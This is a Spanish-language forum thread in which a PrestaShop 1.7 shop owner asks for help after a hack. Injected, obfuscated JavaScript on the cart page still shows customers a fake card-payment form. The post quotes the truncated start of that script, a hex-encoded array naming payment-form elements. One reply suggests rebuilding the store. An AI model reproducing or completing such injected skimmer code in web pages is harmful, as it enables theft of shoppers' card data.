Jump to content

Prestashop 1.7 hackeada


jromangmail2023

Recommended Posts

Buenos días, seguramente este problema ya ha sido reportado en varias ocasiones pero no logro dar con la solución

Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la página del carrito en la parte final del HTML aparece el siguiente script

var _0x5aa5=["\x62\x6E\x70\x6D\x65\x72\x63\x61\x6E\x65\x74\x63\x77\x5F\x63\x6F\x6E\x74\x65\x6E\x74","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x34\x2D\x66\x6F\x72\x6D","\x70\x61\x79\x2D\x77\x69\x74\x68\x2D\x70\x61\x79\x6D\x65\x6E\x74\x2D\x6F\x70\x74\x69\x6F\x6E\x2D\x33\x2D\x66\x6F\x72\x6D","\x70\...............

Perdon por lo largo que es

LLevo meses buscando una solucción a este asunto ya que cuando voy a pagar me está saltando un formulario falso para poner la tarjeta, adjunto pantallazo

No se si alguien me puede oriemntar un poco más porque me estoy quedando sin ideas y es una transtorno bastante serio

Os agradeceria culquier luz que me podais dar

Muchas gracias

pago-fraudulento.jpg

Link to comment
Share on other sites

1 hour ago, jromangmail2023 said:

Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la página del carrito en la parte final del HTML aparece el siguiente script

Mejor hacer la Tienda nueva. Donde estan hospeadas?

Link to comment
Share on other sites

On 4/29/2023 at 12:10 PM, jromangmail2023 said:

Buenos días, seguramente este problema ya ha sido reportado en varias ocasiones pero no logro dar con la solución

Hace aproximadamente 6 meses nos hackearon la tienda en prestahop 1.7 con los archivo php.unit, realizamos la limpieza ccorrespondiente pero cuando accedes a la página del carrito en la parte final del HTML aparece el siguiente script